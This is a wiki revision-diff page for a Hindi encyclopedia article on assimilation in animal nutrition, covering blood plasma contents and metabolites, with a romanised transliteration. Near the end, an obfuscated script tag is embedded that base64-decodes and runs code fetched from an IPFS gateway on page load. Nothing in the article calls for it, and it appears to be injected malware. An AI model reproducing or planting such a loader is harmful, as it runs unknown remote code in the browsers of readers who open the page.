Difference between revisions of "स्वांगीकरण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(9 intermediate revisions by 5 users not shown)
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Assimilation) स्वांगीकरण जन्तुओं के [[पोषण]] की पाँच अवस्थाओं में से एक हैं। पचे हुए भोजन का अवशोषण होकर रुधिर में मिलना और फिर कोशिकाओं में मिलकर जीवद्रव्य में आत्मसात हो जाने की क्रिया को स्वांगीकरण कहते हैं। कोशिकाओं के अन्दर इस पचे हुए भोजन के ऑक्सीकरण होने से [[ऊर्जा]] उत्पन्न होती है। भोजन की अधिक मात्रा को ग्लाइकोजन अथवा वसा के रूप में शरीर के अन्दर यकृत आदि में भविष्य के उपयोग के लिए संचित कर लिया जाता है।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Assimilation) '''{{PAGENAME}}''' अधिकांश जीव जंतुओं के शरीर का आवश्यक अंग हैं। इस लेख में मानव शरीर से सबंधित उल्लेख है। स्वांगीकरण जन्तुओं के [[पोषण]] की पाँच अवस्थाओं में से एक हैं। पचे हुए भोजन का [[अवशोषण]] होकर रुधिर में मिलना और फिर कोशिकाओं में मिलकर जीवद्रव्य में आत्मसात हो जाने की क्रिया को स्वांगीकरण कहते हैं। कोशिकाओं के अन्दर इस पचे हुए भोजन के ऑक्सीकरण होने से [[ऊर्जा]] उत्पन्न होती है। भोजन की अधिक मात्रा को ग्लाइकोजन अथवा वसा के रूप में शरीर के अन्दर यकृत आदि में भविष्य के उपयोग के लिए संचित कर लिया जाता है।
  
'''रुधिर के प्लाज्मा''' में हर समय [[ग्लूकोज]], लाइपोप्रोटीन्स, वसीय [[अम्ल]], ग्लिसरॉल, फॉस्फोलिपिड्स, अमीनो अम्ल, यूरिया, जल, [[लवण (रसायन विज्ञान)|लवण]], नाइट्रोजनीय समाक्षार, [[विटामिन]] आदि उपस्थित रहते हैं। इनमें '''यूरिया''' को [[वृक्क]] नलिकाएँ ग्रहण करके मूत्र के रूप में त्याग देती हैं। अन्य [[पदार्थ|पदार्थों]] को शरीर की सभी कोशाएँ अपनी – अपनी आवश्यकता के अनुसार "कच्चे माल" के रूप मे ग्रहण करती हैं। कोशाओं में पहुँचते ही ये पदार्थ जारण या जटिल पदार्थों के संश्लेषण से सम्बन्धित प्रतिक्रियाओं में भाग लेते हैं। अर्थात कोशाद्रव्य के ही अंश बनकर इसमें विलीन हो जाते हैं। इस प्रक्रिया को पदार्थों का '''स्वांगीकरण''' कहते हैं और स्वांगीकृत पदार्थों को '''मेटाबोलाइट्स''' कहते हैं।  
+
'''रुधिर के प्लाज्मा''' में हर समय [[ग्लूकोज़]], लाइपोप्रोटीन्स, वसीय [[अम्ल]], ग्लिसरॉल, फॉस्फोलिपिड्स, अमीनो अम्ल, [[यूरिया]], [[जल]], [[लवण (रसायन विज्ञान)|लवण]], नाइट्रोजनीय समाक्षार, [[विटामिन]] आदि उपस्थित रहते हैं। इनमें '''यूरिया''' को [[वृक्क]] नलिकाएँ ग्रहण करके मूत्र के रूप में त्याग देती हैं। अन्य [[पदार्थ|पदार्थों]] को शरीर की सभी कोशाएँ अपनी – अपनी आवश्यकता के अनुसार "कच्चे माल" के रूप में ग्रहण करती हैं। कोशाओं में पहुँचते ही ये पदार्थ जारण या जटिल पदार्थों के संश्लेषण से सम्बन्धित प्रतिक्रियाओं में भाग लेते हैं। अर्थात कोशाद्रव्य के ही अंश बनकर इसमें विलीन हो जाते हैं। इस प्रक्रिया को पदार्थों का '''स्वांगीकरण''' कहते हैं और स्वांगीकृत पदार्थों को '''मेटाबोलाइट्स''' कहते हैं।  
  
 
'''जल''' कोशिकाओं में मुख्यतः '''घोलक''' का काम करता है। जल कुछ पदार्थों के संश्लेषण में भी भाग लेता है। आवश्यकता से अधिक जल मूत्र निर्माण में भाग लेता है।  
 
'''जल''' कोशिकाओं में मुख्यतः '''घोलक''' का काम करता है। जल कुछ पदार्थों के संश्लेषण में भी भाग लेता है। आवश्यकता से अधिक जल मूत्र निर्माण में भाग लेता है।  
Line 14: Line 14:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
 
 
[[Category:जीव विज्ञान]]
 
[[Category:जीव विज्ञान]]
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
 +
[[Category:पोषण]]
 +
[[Category:मानव शरीर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:27, 13 February 2015

(aangrezi:Assimilation) svaangikaran adhikaansh jiv jantuoan ke sharir ka avashyak aang haian. is lekh mean manav sharir se sabandhit ullekh hai. svaangikaran jantuoan ke poshan ki paanch avasthaoan mean se ek haian. pache hue bhojan ka avashoshan hokar rudhir mean milana aur phir koshikaoan mean milakar jivadravy mean atmasat ho jane ki kriya ko svaangikaran kahate haian. koshikaoan ke andar is pache hue bhojan ke aauksikaran hone se oorja utpann hoti hai. bhojan ki adhik matra ko glaikojan athava vasa ke roop mean sharir ke andar yakrit adi mean bhavishy ke upayog ke lie sanchit kar liya jata hai.

rudhir ke plajma mean har samay glookoz, laipoprotins, vasiy aml, glisar aaul, ph aauspholipids, amino aml, yooriya, jal, lavan, naitrojaniy samakshar, vitamin adi upasthit rahate haian. inamean yooriya ko vrikk nalikaean grahan karake mootr ke roop mean tyag deti haian. any padarthoan ko sharir ki sabhi koshaean apani – apani avashyakata ke anusar "kachche mal" ke roop mean grahan karati haian. koshaoan mean pahuanchate hi ye padarth jaran ya jatil padarthoan ke sanshleshan se sambandhit pratikriyaoan mean bhag lete haian. arthat koshadravy ke hi aansh banakar isamean vilin ho jate haian. is prakriya ko padarthoan ka svaangikaran kahate haian aur svaangikrit padarthoan ko metabolaits kahate haian.

jal koshikaoan mean mukhyatah gholak ka kam karata hai. jal kuchh padarthoan ke sanshleshan mean bhi bhag leta hai. avashyakata se adhik jal mootr nirman mean bhag leta hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh